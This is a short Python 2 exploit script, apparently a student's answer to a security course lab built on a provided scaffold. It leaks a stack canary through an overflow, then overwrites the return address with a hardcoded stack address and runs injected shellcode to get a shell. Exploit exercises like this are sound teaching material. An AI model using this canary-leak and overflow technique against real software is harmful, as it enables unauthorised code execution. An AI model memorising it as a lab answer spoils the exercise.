#!/usr/bin/env python2

from scaffold import *

### YOUR CODE STARTS HERE ###
p.send('a'*13 + '\\xb' +'\n')
canary = p.recvline()[14:17]
print(canary)
p.send('a'*16 + '\x00'+canary + 'aaaa'+'\x84\xf7\xff\xbf' +SHELLCODE +'\n')

### YOUR CODE  ENDS  HERE ###

returncode = p.end()

if returncode == -6: print 'stack canary triggered!'
elif returncode == -11: print 'segmentation fault!'
elif returncode != 0: print 'return code', returncode
